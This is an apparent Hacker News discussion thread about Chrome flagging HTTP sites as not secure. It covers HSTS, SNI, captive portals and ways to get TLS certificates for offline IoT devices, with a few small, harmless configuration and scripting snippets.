You've moved from claiming, essentially, direct commercial benefit (solidification of monopoly position) to "any benefit at all". I'm pretty sure no matter how i answer you are going to try to contrive benefit out of it.
But i asked explicitly (when dealing with the non-public thing), and the answer all the way up to, as far as i know, Larry, was "no, we should do this because it's the right thing to do, we don't care if it benefits us".
I did not justify the expense in terms of benefit to my company.
As a lawyer, i can also tell you the professional duties you claim are either non-existent or not as absolute as you make them.
Google, and pretty much all corporations, are simply not the black and white things you paint them to be.
(and also, for the record, i actually very much hate corporatism :P)
> As a lawyer, i can also tell you the professional duties you claim are either non-existent or not as absolute as you make them.
"under American law we have a fiduciary responsibility to our shareholders to account for things properly, so if we were, for example, to just arbitrarily decide to pay a different tax rate than we were required to, a more favourable one for example to a particular country, how would we account for that?" - Eric Schmidt on why Google paid "£3.4m in tax on £3.2bn of sales" (.1%)
I'm really unsure what this comment is supposed to add to the discussion. It doesn't respond substantively to any point i made, it's not even relevant to the quote you are responding to, and it's not caselaw or legal argumentation; it's a CEO giving a political answer to a question. Is that supposed to be shocking or something? I'm not even sure.
Truthfully, it makes it seem like you aren't even trying to have a real discussion, you just want to grind an axe.
[1] "While the duty to maximize shareholder value may be a useful shorthand for a corporate manager to think about how to act on a day to day basis, this is not legally required or enforceable ….
Under this legal regime, it is not malfeasance for boards or corporate chiefs to make decisions that do not maximize shareholder value."
[2] "Contrary to what many believe, U.S. corporate law does not impose any enforceable legal duty on corporate directors or executives of public corporations to maximize profits or share price" (https://corpgov.law.harvard.edu/2012/06/26/the-shareholder-v...)
[3] There are only two legal duties here. The duty of care and the duty of loyalty. As I said, neither is about maximization of profits, though you will occasionally find courts with loose language around the duty of loyalty. The duty of loyalty's history is about not making money at the corporations expense - you must put the corporation's interests above your own. Transforming that into a "you must maximize profit at all costs" is ... a pretty far step. Again, 99.99% court cases here, and traditional breach of this duty are about either taking a corporate opportunity for yourself or making self-interested transactions.
"A direct quote of Google's long time former CEO making the exact same argument I am seems pretty on topic to me."
It's only on topic because you keep changing topics!
You've now gone and pretty much ignored every point made and just shifted discussion to something else in pretty much every reply.
It's not even the same argument you have made in these replies, as you claim.
(Eric is talking about accountability to shareholders, you started by talking about direct benefit to the business. These are incredibly different things)
So while this has been fun, it doesn't seem very useful or constructive.
"obviously marking password input fields as "NOT SECURE""
- firefox has been doing this for a while, confuses some of my users - I am glad it's there, but wish it did not completely cover the login button on wordpress fields. Very glad there is a "learn more" attached to this.
"Google and others like Mozilla have had to drag many site owners kicking and screaming"
- I was dragged into this by the Google threats. Spent hours on it. Come to find our most popular few pages use a script that just will not function over https - no way to make it happen.
Then I spent hours crafting htaccess rules to make some pages https (home and password pages) - and some pages forced non-https (the 5 pages we have with needed chat script on them) - more hours into updating links on all pages and everything -
then i come to find out that browsers have a function where, if your home page is https, they won't pull the sub pages as non-https (mixed content blocking; maybe it's the other way around, it's been a while) -
So I had to go and undo all the changes. I've been spending time trying to help develop newer chat scripts to have all the functionality of the old one our users prefer, to no avail. So as google forces https on sites to be in its results, and now to not be labeled as insecure, we currently have to choose between removing our most popular functions on our site or losing the google battle completely.
We are still trying to get a newer chat system up and running that has our old familiar functions, but we don't have the resources that google and others have obviously.
We want https so bad; we love, love, love encryption, the more the better. It just has not been an easy thing for us to implement, and we've tried many things, including pushing our users to newer html5 based chat systems and such. Nothing has panned out quite yet. Fingers crossed we make strides in these areas before it gets worse.
No offense, but this can't have come as a surprise. The writing has been on the wall for a very long time. I'm glad that Google is forcing companies' hands here, because it is obvious that if they didn't, some would never "find time" to get it done.
You may want to update the website linked via your HN profile as well. To start with, every page includes unicode replacement characters mixed into the text.
To be completely honest, this kind of counter-argument (not that you are advocating against HTTPS, but bear with me) always reads to me like "people forget passwords, and don't like having to type usernames, so we just rely on the honor system".
Yes, security has downsides, but in my opinion those downsides are well worth it for the benefits.
Personally i wouldn't mind it that much if the browser let me bypass the error, but HSTS seems to mean "even if the site would work fine otherwise, keep it broken". There have been several cases where i couldn't bypass such an error on a site where i just wanted to read something, and i was very surprised to see that Firefox didn't have any about:config option to indicate "i know what i am doing, let me in". So much for taking back the web. Seems it was only temporary so we can hand it to Google.
If browsers allowed you to bypass HSTS, then it could be easily defeated by an attacker by breaking the traffic on port 443, forcing the user to disable SSL for the site. What would be the point over regular SSL? HSTS was designed as a response to programs like sslstrip, where the implementation of SSL may be attacked so the user is made vulnerable.
If a website puts out an HSTS header, they are telling the browser they need a higher bar of security than regular SSL.
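To make that concrete: the "higher bar" is just a response header sent over HTTPS, which the browser remembers and then refuses plain HTTP (and cert-error bypasses) for that host until max-age expires. A minimal sketch of the parsing a browser does (illustrative only; this is not any browser's actual implementation):

```python
def parse_hsts(header: str) -> dict:
    """Split a Strict-Transport-Security header into its directives."""
    directives = {}
    for part in header.split(";"):
        part = part.strip()
        if not part:
            continue
        if "=" in part:
            name, value = part.split("=", 1)
            directives[name.lower()] = value.strip().strip('"')
        else:
            # Valueless directives like includeSubDomains act as flags.
            directives[part.lower()] = True
    return directives

# A typical header: remember for one year, subdomains included.
print(parse_hsts("max-age=31536000; includeSubDomains"))
# → {'max-age': '31536000', 'includesubdomains': True}
```

Once those directives are stored, the browser rewrites future http:// navigations to https:// for the host before any request leaves the machine, which is what defeats sslstrip-style downgrades.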
And if I am a user of that website and am willing to accept the risks, why does Google force me to live with their opinion? HSTS should be bypassable with user consent.
I get the distinction, but it's the browser that enforces the website's opinion, and I'm arguing that the browser should give the user absolute control for those users that want it.
Similarly: I have a static site (no tracking, no PII) that's currently hosted on a friend's VPS. HTTPS is out, because they're already using it for something else, and Apache can't know which vhost the user is requesting in time to present the appropriate certificate. Maybe there's a workaround for that, but neither I nor my friend know of any, we've both already spent a few hours looking, and I do not feel like spending even more time figuring it out, or moving the site to a dedicated VPS with its own IP.
Basically, on the one hand I'm all happy. On the other hand, I totally do not want to do the work.
And beyond that, all the extra complexity introduced everywhere that you mention, and that I also had happen to me.
If I'm understanding your issue correctly (you have two or more domains on the same IP address), then Server Name Indication (SNI) has worked for a very long time and addresses this for you: https://wiki.apache.org/httpd/NameBasedSSLVHostsWithSNI
Support is at about 97.9% globally: https://caniuse.com/#search=SNI - Effectively every browser released since 2010 plus IE 7 and 8 on Vista.
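For the mechanism: the client sends the desired hostname in the TLS ClientHello, and the server picks a certificate before completing the handshake. A rough server-side sketch in Python (the hostnames and cert paths are made up; `sni_callback` is the stdlib `ssl` hook for exactly this):

```python
import ssl

# Hypothetical hostname -> (certfile, keyfile) mapping.
CERTS = {
    "example.com": ("/etc/ssl/example.com.crt", "/etc/ssl/example.com.key"),
    "blog.example.com": ("/etc/ssl/blog.crt", "/etc/ssl/blog.key"),
}

def choose_cert(server_name, default="example.com"):
    """Pick the cert/key pair for the hostname the client sent via SNI."""
    return CERTS.get(server_name, CERTS[default])

def sni_callback(ssl_sock, server_name, initial_context):
    # Called mid-handshake, before any certificate is sent to the client.
    certfile, keyfile = choose_cert(server_name)
    ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
    ctx.load_cert_chain(certfile, keyfile)  # needs real files to work
    ssl_sock.context = ctx

# Wiring it up (sketch):
# server_ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# server_ctx.sni_callback = sni_callback
```

Apache's `NameBasedSSLVHostsWithSNI` support does the equivalent internally, which is why multiple HTTPS vhosts on one IP have worked for years.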
I'm actually quite shocked that 19 of the top 100 pages still use http by default. For small or internal pages that's fine but top 100 pages on the internet? Any idea which pages they're talking about?
Google's Transparency Report shows a list of which top sites do modern HTTPS by default, which do it only if you explicitly request the HTTPS site, which have crappy cryptography (e.g. TLS 1.0 only, or requiring 3DES), and which have nothing at all.
The last category features many Chinese sites. I could speculate about why that is, maybe the Great Firewall gives citizens no reason to bother trying to achieve security, maybe Chinese culture opposes privacy, maybe everybody in China is running Windows 95 still. But whatever the reason, that's an observable fact.
There's also a whole bunch of crappy British tabloid newspapers there. Given their print editions are specifically printed on the worst quality paper that will take print ink, and they are routinely accused of "gutter" journalism, perhaps it isn't a surprise that defending their reputations through the use of encryption isn't a priority? Or you know, maybe British culture... British great firewall... etcetera. No idea.
Fine, as long as they don't eventually make it difficult or impossible to ignore the warnings (as they've done with SSL sites with invalid certs). I have numerous devices with web interfaces that are 100% internal to my network and not reachable from the open Internet, but Chrome still refuses to let me access them (side note: thanks, Firefox, for respecting my decision as a user!). I can envision a near future where Chrome treats HTTP sites the same way.
You can still visit websites that have an invalid CA or invalid certificate DNS match, but if the website is set up for HSTS/HSTS preload then chrome respects the website's decision to not allow insecure connections.
I was accessing an internal router with firmware from the distant past of 2011. Note that this is an internal-only router that connects a couple of trusted subnets, so security isn't an issue and there's no requirement to replace it yet. The problem that bit me yesterday was that I literally could not find a way to get Chrome to open https://ro.ut.er.ip/ because the router's ancient cert is invalid.
I would have been perfectly fine with Chrome alerting me to that fact and providing a "click here to continue anyway" link, but that seems to no longer be an option. FWIW, Safari did the exact same thing. Only Firefox gave me the "I promise that's really what I want to do step aside plz" button I needed.
I hope you’re joking...? An interface that forbids you from working unless you know an easter-egg/“insider” password is almost a fascist concept. I guess that’s another reason not to use Chrome...
For HSTS, it’s based on the spec. There’s not supposed to be a user-accessible override for HSTS errors, which is why Chrome hides it behind that easter egg. Firefox has no override of any kind.
Yeah, it's annoying having to fall back to older versions. However, there's a good reason they disabled the ability via a config or launch parameter: many organisations were not upgrading internal systems and websites because they could just let their browsers bypass validation.
Still sucks for consumer grade stuff. I'm surprised your router offers SSL at all though.
>Many organisations were not making upgrades to internal systems and websites as they could allow their browsers to bypass validation.
That's like shutting down all roads because some drivers break the speed limit. If Google isn't taking collateral damage into their decisions that impact everyone, they need to stop controlling the web.
I had this problem with a firewall (sonicwall) and I ended up SSHing into the firewall and then allowing regular http traffic (because literally none of the browsers on my computer: ie11, firefox, or chrome would load it.)
The problem is when Google goes and throws a commonly used internal-only TLD like .dev in their HSTS list. And of course, the whole problem that HSTS is the hosts file all over again.
That being said, the real fault in that incident is ICANN selling .dev in the first place. They should've been well aware of its common use, and opted not to sell it.
I think you're putting too much thought into it. It's very simple: .dev is a massively easy to monetize TLD, it was guaranteed to get multiple companies trying to buy it, and when they had multiple offers, they got auctioned.
I think .dev was just too much money for ICANN to say no.
Of course, it looks like ICANN may have gotten screwed, because Amazon and Google appear to have privately arranged to figure out who was going for which TLDs: https://icannwiki.org/.dev
Can you self-sign a certificate from the internal server and install it as trusted on the work computers? Or does Chrome only trust certificates that Google trusts?
Generally speaking, Chrome uses whatever is in the OS trust store, with certain exceptions for CAs that have been naughty (e.g. StartCom, WoSign, Symantec) or subCAs that were revoked via CRLSets. Private CAs present in the OS trust store will generally just work, the only exceptions being things like Superfish.
One small annoyance/drawback with everything moving to https: I travel a fair bit, and hotel wifi usually relies on users connecting to their AP and then using a DNS-based redirect to send the user to the login page. That only happens when on http, as https sites which are redirected get the MITM warning from the browser. I used to be able to just type in "google.com" in the address bar and be redirected accordingly; nowadays I struggle to remember a site I use which isn't https. Looking up the gateway address is kind of a pain too.
No, worst case you'll see a security warning. Or chrome will add an exception for such a site. This is a well known problem that I'm sure will be addressed. But with the current state of the web (~20% unencrypted) it's not really an issue yet.
example.com has SSL: https://example.com/ -- so browsers may one day default to using that. I'd really recommend http://neverssl.com/ for this purpose; the homepage explains it's literally designed for situations like captive portals.
neverssl.com is not IANA reserved, but a) typing in "example.com" into a browser may default to https in the future, instead of http, and b) no IANA or RFC guarantees that example.com won't redirect in the future anyway.
Windows 10 detects this by trying to load msftconnecttest.com in a browser when its heuristics suggest the wifi requires sign-in, which should redirect you to the wifi sign-in page. Android detects this as well, by going to some Google-owned page that redirects you to the wifi sign-in if it detects that it is needed. What are you using that this is still a problem?
iOS and macOS both have captive-portal detection (in fact I think they pioneered it) but it's not 100% fool-proof and sometimes doesn't show up when it should.
Also supposedly some captive portals trap the well-known URLs used by captive portal detection for whatever reason (which is why Apple uses a huge list of seemingly-random domains)
But the browser could default that to https since that's allowed. If you use a real domain that has no https equivalent you should be safer (neverssl.com is one of those).
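The detection trick described in the sibling comments can be sketched in a few lines of Python. The probe URL below is Firefox's real captive-portal endpoint, but any HTTP-only URL with a fixed, known body would work; the rest is a plain known-plaintext comparison.

```python
import urllib.request

# Probe URL with a known plaintext body. detectportal.firefox.com is a
# real endpoint used by Firefox; any fixed-content HTTP URL works.
PROBE_URL = "http://detectportal.firefox.com/success.txt"
EXPECTED = b"success"

def looks_like_captive_portal(body: bytes, expected: bytes = EXPECTED) -> bool:
    # A portal that intercepts the request returns its login page
    # instead of the expected plaintext.
    return body.strip() != expected

def probe() -> bool:
    # Must be plain HTTP: over HTTPS the interception would instead
    # surface as a certificate error.
    with urllib.request.urlopen(PROBE_URL, timeout=5) as resp:
        return looks_like_captive_portal(resp.read())
```

The same idea underlies the OS-level detectors discussed above; the OS just does it automatically on network join.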
This totally sucks for web based services and sites which don't have a (user friendly) chance to use HTTPS.
Think of LAN-only IoT devices which aren't proxied through an external company site, have no domain, are accessed through a local-network IP, and maybe run in a non-internet environment.
I wish there were a solution for web-based encryption in this application domain, and that browser vendors would start to think outside their internet-only box. ... same goes for service workers.
Unfortunately, this is a problem that will never go away, no matter how slowly and gracefully we transition. There is no alternative that allows these devices to continue to operate without friction that doesn’t also enable current device manufacturers to kick the can down the road by releasing new HTTP-only devices.
If we want to keep making the web a safer place, these kinds of cutoffs have to happen. Infinite backward compatibility simply holds everyone back for the sake of decreasingly-relevant devices and irresponsible manufacturers of new hardware and the customers who purchase their products.
so the solution to the warning is to make your offline IoT devices secure, but how do you actually do that? i have an IoT product that runs a web server and needs to be accessible by users when the internet connection isn't available. how do I enable HTTPS on it? (this is not a hypothetical. it's a problem i actually need to solve)
as far as i can tell, my options are:
- install a self-signed cert on the device and force my users to click through all the warnings chrome throws up about untrusted certs
- create my own CA cert and sign the cert with that, and convince the user to install my CA cert as a trusted cert (which is not possible on iOS)
- get a cert signed by a trusted authority, and get the user to add an entry to their /etc/hosts file that maps the domain the cert is valid for to whatever address the device is assigned
- distribute a native (electron?) app that interfaces with my device and trusts my cert, and disallow direct browser access.
- find some sketchy SSL issuer who is willing to issue certs for *.local domains and run an mDNS resolver on my device
- Use HTTP instead of HTTPS and the only downside is a little badge in the address bar saying "not secure"
I'd love to have HTTPS everywhere, but i honestly don't know how to make it happen.
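For what it's worth, the first option above (a self-signed cert the user clicks through) can at least be automated on the device at first boot. A minimal sketch in Python, assuming the openssl CLI is on the PATH:

```python
import pathlib
import subprocess

def make_self_signed(cn: str = "device.local", days: int = 3650,
                     outdir: str = ".") -> None:
    """Generate a throwaway RSA key plus self-signed cert on first boot.

    Assumes the openssl CLI is available on the device. Users will still
    have to click through the browser's untrusted-certificate warning,
    but at least each device gets its own unique key.
    """
    out = pathlib.Path(outdir)
    subprocess.run(
        ["openssl", "req", "-x509", "-newkey", "rsa:2048", "-nodes",
         "-keyout", str(out / "key.pem"), "-out", str(out / "cert.pem"),
         "-days", str(days), "-subj", f"/CN={cn}"],
        check=True, capture_output=True,
    )
```

Generating per-device keys this way avoids the much worse pattern of shipping one shared private key in the firmware image.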
> - distribute a native (electron?) app that interfaces with my device and trusts my cert, and disallow direct browser access.
This is the most secure choice, using something like websockets to transfer data only.
Unless your product is completely offline and never connected to the internet, I don't think an IoT device that runs a web server is ever a good idea. All it takes is one successful remote attack, and soon your users could be installing ransomware at the device's direction!
Don't serve HTML/JS from a device that you can't physically pull the plug on.
I'm not sure how your comment is supposed to help.
I don't think a web server is ever a good idea. All it takes is one successful remote attack and soon your users could be installing ransomware! We'd better shut down the internet.
I have dnsmasq running internally and my regular Netgear router gives out the IP of that internal host as the dns resolver. Local hosts are given subdomain names for a domain I control (pi3.example.com camera.example.com seedbox.example.com etc) and resolve to an internal IP. These domains resolve, on the public internet, to the one publically-accessable host in my network. That machine runs certbot and gets the cert. It then rsyncs the certs to the internal machines every renewal.
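The resolver half of that setup is just a few lines of dnsmasq configuration; the names and addresses below are placeholders for the poster's actual hosts:

```
# /etc/dnsmasq.conf on the internal resolver:
# answer these names with LAN addresses, forward everything else upstream
address=/pi3.example.com/192.168.0.10
address=/camera.example.com/192.168.0.11
address=/seedbox.example.com/192.168.0.12
```

The public DNS for the same names points at the one internet-facing host, which is what lets certbot's validation succeed even though browsing happens against the LAN addresses.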
They should be doing the same thing for Javascript then. Release a version of Javascript without the crappy bits and not run the old version of Javascript.
> Think of LAN only IoT devices which aren't proxy through a external company site, have no domain, are accessed through (local area network IP) and maybe run in non internet environment.
As long as it's a “Not Secure” omnibox warning, I don't see it as a problem even there. Now, if they adopted the “block with non-obvious escape hatch” approach used for certificate errors for HTTP, that would be a problem.
I didn't read anything in the article that said that HTTP will stop working, only that it'll be marked as not secure in the new Chrome. If you understand the security risks involved and are okay with continued use of bare HTTP, it shouldn't make any difference to you.
the future of IoT is HTTPS with client side X.509 authentication. you don’t need internet to make that happen. but if you are web based and not using HTTPS... i can only ask why not? internal CAs are free
all you need is a certificate on the device and an app in the app store. or an installer they can download to their computer. you don't need a full-on traditional CA. you just need to verify (one) certificate.
sign the certificate in the manufacturing plant and put it in the coffee maker. give the CA cert out in the app or the installer. now you can verify if the coffee maker talking to you over HTTPS is legit and probably get its serial number off the cert too. your CA keys never see the public. you could go even more secure and use that as a bootstrap to a per-customer CA and generate a new cert on install, but this is a coffee maker right?
What app store? Which OS? Do you now suddenly have to write software for all OSes to install the certificate? Something that you didn't even have to think about doing before. The entire reason you went for a webui to begin with.
That is a generalization. You certainly do with many networked appliances. And I prefer this, since that means connectivity with the device is not dependent on some cloud service. And that some cloud service can't control my appliance.
It's impossible to get a valid SSL certificate for an appliance running within someone's LAN without opening ports. And opening ports would make the appliance even more vulnerable to attack.
Now that fully automated certificate issuance is becoming more mainstream (thanks to Let's Encrypt) I foresee this sort of thing becoming much more common in the future.
Unless I'm misunderstanding they did that by partnering with a CA. Becoming a semi-trusted CA themselves. This is not an option for most organizations.
That was only necessary because, at the time, there was no other way to get a large number of wildcard certs issued for their domain in an automated fashion.
With ACME that will no longer be the case. Let's Encrypt will allow you to do basically the same thing for free with ~20 devices a week[1] starting on February 27[2], for example. In the future, commercial CAs may choose to offer similar services with more relaxed rate limits.
It's possible, why not? Just use your own servers as a cert signing service for your IoT device as part of the bootstrap process if you are unwilling to have any services running on it. Or ship the device with the signed cert. You can have the host name in the DNS even though it's not accessible from everywhere.
> Can you not just create a certificate and push it to the system as a trusted cert?
If you were to control the user's machine, yes. But imagine you bought a shiny new internet connected coffee pot. Once you turn it on it does the following:
1. Coffeepot determines its LAN IP address (e.g. 192.168.1.100)
2. Coffeepot connects to the coffeepot cloud service to register a dynamic DNS entry (e.g. user1.coffeepot.com) to point to its LAN IP address.
3. User is told they can access their coffeepot WebUI by going to user1.coffeepot.com, which resolves to 192.168.1.100
This is secure since the coffeepot can only be controlled if you are in the same network. Yet, since the coffeepot webui can only be reached if you are in its network, it is nearly impossible to get a valid SSL certificate on the coffeepot appliance.
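Steps 1 and 2 above can be sketched as follows. The cloud endpoint and payload shape are hypothetical, not a documented API; a real device would also authenticate itself to the service here.

```python
import json
import socket
import urllib.request

# Hypothetical registration endpoint -- an assumption for illustration.
REGISTER_URL = "https://api.coffeepot.example/v1/dyndns"

def lan_ip() -> str:
    # Step 1: opening a UDP socket toward a routable address reveals
    # which local interface the OS would use; no packet is actually sent.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.connect(("192.0.2.1", 80))  # TEST-NET address, never contacted
        return s.getsockname()[0]

def register_payload(device_id: str, ip: str) -> bytes:
    # Payload shape is made up for the sketch.
    return json.dumps({"device": device_id, "ip": ip}).encode()

def register(device_id: str) -> None:
    # Step 2: tell the cloud service to point user1.coffeepot.com
    # (or similar) at the LAN address.
    req = urllib.request.Request(
        REGISTER_URL,
        data=register_payload(device_id, lan_ip()),
        headers={"Content-Type": "application/json"},
    )
    urllib.request.urlopen(req)
```

Note this is outgoing traffic only: the device phones home, and nothing needs an open inbound port.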
> Presumably there is already some sort of communication going on if they're receiving Chrome updates.
There is a difference between outgoing network traffic and incoming network traffic. Only the latter requires open ports.
3. Coffeepot fails to connect to the cloud service because it's in some remote place with no internet.
Why does the coffeepot / TV / thermostat need internet access? That's often undesirable for the user (because that means the whole things breaks if the originating company goes away). Not to mention, how would the user know which host to connect to? How would the device get on WiFi if there is no way to enter the password?
I know Chromecast does this by making you download a custom application (Google Home on a phone, or Chrome on a desktop); that's not always practical.
I do think SSL in as many places as possible is great; I just also think they're trying to push for too much before solving the problems it will cause first.
It doesn't need it. You can always just nmap your network, find its lan ip and connect straight through that over http. But that's not very user friendly, hence the dyndns.
2 (alternative): Coffeepot connects to the coffeepot cloud service to register a dynamic DNS entry (e.g. user1.coffeepot.com) pointing to its LAN IP address, and sends a Certificate Signing Request for user1.coffeepot.com?
If you are already registering a dynamic DNS, a CSR shouldn't be that much additional overhead?
Actually, now that I think about it, with the Let's Encrypt DNS challenge this might actually be viable... That's pretty recent, though. And they rate limit harshly. I was thinking about the HTTP validation, which would definitely fail, due to the DNS resolving to a LAN IP. Which a CA would obviously not be able to verify.
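The DNS challenge is viable precisely because the CA only has to see a TXT record, not the LAN-resolving A record. Per RFC 8555 (ACME), the TXT value is the unpadded base64url SHA-256 of the key authorization; a stdlib-only sketch:

```python
import base64
import hashlib

def dns01_txt_value(token: str, jwk_thumbprint: str) -> str:
    """RFC 8555 DNS-01: the _acme-challenge TXT record holds the
    base64url-encoded SHA-256 of the key authorization, which is the
    challenge token joined to the account key's JWK thumbprint by '.'.
    The base64url encoding is unpadded."""
    key_auth = f"{token}.{jwk_thumbprint}".encode()
    digest = hashlib.sha256(key_auth).digest()
    return base64.urlsafe_b64encode(digest).rstrip(b"=").decode()
```

The device's cloud service (which already controls the zone for the dynamic DNS names) would publish this value at _acme-challenge.user1.coffeepot.com, so the HTTP-reachability problem never arises.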
Right, that burden becomes coffeepot.com's. Supposedly they would already be doing due diligence to make sure that the dynamic DNS requests were from legitimate coffeepots that they themselves manufactured (rather than say the fraudulent activities of a botnet using their open DNS for communications). At that point they should also have enough security information to verify if they should sign a certificate presented to them by their manufactured coffeepot under their certificate authority delegation to *.coffeepot.com.
To my knowledge you can even piggy back off of ACME's protocol work from Let's Encrypt, even if the auth/validation checks are different for the different security models.
It's certainly possible to pay for such a thing today; many of our friends in Fortune 50+ companies have access to such things. You are right that we mere mortals with dreams of a tiny coffeepot IoT empire over HTTPS must hope that, in the post-Let's Encrypt era, the cost of such delegating certificate-authority certificates drops to be commensurate with other certificate types.
So much work for so many people to update so many old websites that will see absolutely zero benefit from serving content via ssl.
I have an old travel blogging site with a few hundred thousand posts in read only mode. Thinking about how much work it was to upgrade my other sites to https, chase down and work around every http request in the code base, purchase and install certs for silly things like cloudfront that you wouldn't think would suck away two days of your life.
I'll probably just let the site die in July. It doesn't make money, so it's going to be a tough decision whether to dump thousands of dollars of otherwise billable time into upgrading it to accommodate google's silly whim.
It makes me a bit sad to hear you are distressed by this news. Would you like some help setting up SSL? We could go over Certbot & Let's Encrypt, as well as provide some advice on things like HSTS, mixed content, etc...
My email address is in my profile. I'm happy to help you however I can. I may not be able to make any code-level changes, but there may not be much work that needs to be done.
Edit: I just saw your comment https://news.ycombinator.com/item?id=16338576 -- I understand there's potentially a lot of one-time work, but it could be done very gradually, and with this announcement, I think CDNs and widget makers would adopt SSL as well. Once the site does support SSL, you can make SSL-related upgrades (like disabling old ciphers or protocol versions) without much disruption.
Could you help me understand scenarios where Let's Encrypt and CloudFlare SSL won't suffice? They have, e.g. added wildcard support now, so that's another angle covered.
I have sites on Azure and I could add CloudFlare SSL, but it's some work to make that happen and I will have to do it now for all my static sites that absolutely do not need TLS (no forms, no cookies, no javascript).
Or else I have to pay for a cert, a cert is still like $10-$20 per year, per site so that is a lot of money if you have a lot of static sites compared to what the site costs to host (which is near-to-nothing).
And for other shared hosting solutions I'm not really sure if it's possible to implement CloudFlare SSL (I have never implemented it, so I'm not really sure what's required). The reason I don't want Cloudflare is that it adds a third party just because Google said I must or I'll get punished for it.
Hopefully Azure will implement some solution to provide SSL for free. I suspect with this announcement, free SSL may get more attention on hosting providers. There's already several tickets open on the Azure feedback website: https://feedback.azure.com/forums/170024-additional-services... -- this problem may go away mostly by itself if it continues to get easier every year.
Google isn't making you do anything, merely notifying users that the connection to your website is not secure.
This! When I was on a cheap shared and hosted solution the idea of LE was waaayyy above me.
But, I moved over everything to AWS, for the same amount of money (OK, ~$0.60 more than what I was paying before - relatively nothing), and it became a piece of cake.
That initial time commitment to the move, though, will never be recouped. I do however look at it as a career-expanding experience (fairly confident now in how AWS works for projects/companies), so I've got that going for me.
You could always consider a free service like Cloudflare which can sit in front of your site and serve the site via SSL to your customers. Yes, it's still unencrypted between CF and your site, however it would resolve the poor "insecure" UX.
As a bonus, CF also has functionality that can rewrite http URIs to https.
If you do what you describe, the site will load minus all of its imagery and scripts, since those will be linked from a CDN as http://img.whatever.com/ or whatever. Anything linked with a full URL, no matter how deep in your codebase, will surface at some point in the future and throw up a scary warning for your users.
And you get to find homes for those 3rd party scripts hosted on http only domains.
And in my case I'll probably get to rewrite a Google Maps integration because that will have taken the opportunity to deprecate something important.
There really is a ton of work to pull this off. For every site on the internet more than a few years old.
And again, for zero benefit whatsoever except to clear the scary warning that Google plans on introducing.
Cloudflare has a new feature wherein they can use HTTPS Everywhere's translation list to rewrite http references to use https where possible. It's almost certainly not perfect, but for many people it should at least reduce the amount of effort required. It's explicitly intended for the deep-within-your-codebase/CMS case you mention.
My understanding is that you'd need to be sitting between me and that webserver somewhere. If my ISP injects something into that page that changes it so that it no longer shows a dumb travel story from 15 years ago, I think the proper solution would be to change ISPs.
If one strongly held that position, one could make a killing selling fixed-price contracts to audit and fix all SSL issues for any website running on any stack, regardless of age.
$1,000, fixed price, guaranteed no Google Chrome warnings or your money back.
Personally, that would not be a business I'd take on. Would you? If so, I (and a lot of other people) have some consulting work for you.
"To continue to promote the use of HTTPS and properly convey the risks to users, Firefox will eventually display the struck-through lock icon for all pages that don’t use HTTPS, to make clear that they are not secure." [1]
My guess is that it was just a way to keep the message simple and not have too many numbers to distract the reader. The numbers for each pairing were probably conveniently close together, so combining them cut out two bullet points from an already very short blog post.
I predict "Not secure" will lose meaning for many people. There are just too many non-HTTPS websites. Traffic is not a relevant metric for this; tell me instead how many of the websites that a user visits are http.
That matches my personal numbers for page views too, but TLS is site-specific, not page-specific, and it is deployed on a small minority of websites on the internet (20-25% of the top 1 million), so my point still holds.
I may spend 80% of my time (whatever that means) on a few HTTPS websites, but I also spend 20% of my time browsing much larger proportion of non-https websites.
So the warning will be popping up a lot and will soon become a thing to ignore.
It’d be better to only include non-HTTPS entries when an HTTPS entry doesn’t also exist:
$ sqlite3 places.sqlite 'select url from moz_places' | python3 -c '
import sys, urllib.parse
v = [urllib.parse.urlparse(l) for l in sys.stdin]
secure = {u.hostname for u in v if u.scheme == "https"}
insecure = {u.hostname for u in v if u.scheme == "http"}
print(len(insecure - secure), len(secure))'
430 1124
Even this will miss places you haven’t visited in a while that have since added security, though.
It's very simple: with HTTP, ISPs can see your traffic and target ads directly at you. If everything is under HTTPS, they will need to resort to Google for ads, since almost everyone uses Google's search engine and its products.
Eventually they’ll remove or downplay the secure label if the site doesn’t support modern TLS standards.
There’s no reason for users to trust a site when they see a secure icon, when the web goes secure by default, we’ll start to see this icon gradually disappear, reducing its importance. Secure TLS will need to be the default and it should be recognized in the browser that the transmission is secure but the site and its contents shouldn’t necessarily be trusted. Until and unless other trust standards are developed and promoted this way — like secure DNS — I see no reason why web browsers should highlight secure web pages. If anything they should indicate if people are about to use a new site, vs loading a commonly visited site to warn you about phishing attempts. They could also protect your privacy for you. But I think site identity validation and secure data transport should be independent concepts in browser UI.
* HTTPS w/ Let's Encrypt (No complaints, but no true secure lock.)
* HTTPS w/ a paid certificate (True magical green box)
In fact I think this should apply to all browsers. This might not deal with all of the issues, but it would be a good start. Feel free to point out where I'm wrong.
Let's Encrypt isn't the problem here. Expecting all CAs to properly verify what is and isn't a phishing website is unreasonable IMO. It just won't happen. Smaller CAs have hundreds of thousands of certs... it's just not possible.
The real issue is that a cert only says "Your communication with this site is encrypted, and you're speaking to the owner of this certificate" (assuming it hasn't been compromised). Certs don't make any guarantee that the person you are talking to is a good guy, nor that they aren't trying to trick you into giving your password to them.
Will the extra magic of the green box make users more secure? Does paying for a certificate make the certificate more trustworthy?
These are actually serious questions that I think the CA/Browser Forum are discussing (particularly in terms of the issuing requirements and UI representation for EV certificates), but I think it often boils down to the "feeling" of security, relying on the supposition that criminals would be less successful if their site didn't have the magical green box, or that they would be easier to catch by tracing the credit card payment they used to buy their certificate.
It occurs to me that Google has some incentive to do this. Ad blocking is much more difficult with https and requires an ordinary user inject a certificate of dubious origin/security.
> Ad blocking is much more difficult with https and requires an ordinary user inject a certificate of dubious origin/security.
What do you mean? I can see how this might apply if you're trying to MITM your https requests and ad block them that way, but a browser (or its plugin) can simply choose not to display an element on the page without doing that.. right?
Okay, because everyone just downvotes this without reason
Notice the massive downvoting of other, otherwise reasonable, comments here too --- that is because any discussion around security seems to trigger a primitive instinct of fear, the very thing that corporations and governments have learned to harness and exploit to their advantage.
It is really the same as the terrorism and "think of the children" arguments, and just as hard to have reasonable discussion or even opposition to.
Some people don't run ad blockers on the client; they block at a centralized location instead, like with Pi-hole at the DNS level. HTTPS can impact Pi-hole. See this...
> Since Pi-hole only knows about the domain being requested and not the protocols being used to access it, Pi-hole will intercept HTTPS advertisements and since the Pi-hole does not have the certificate of the actual server being queried, you may see slow loading times waiting for the request to time out.
Now that we're done conflating encryption with certificates and cheapened the meaning of certificate trust, what are we going to use to establish which entity actually controls the domain name we are pointed to?
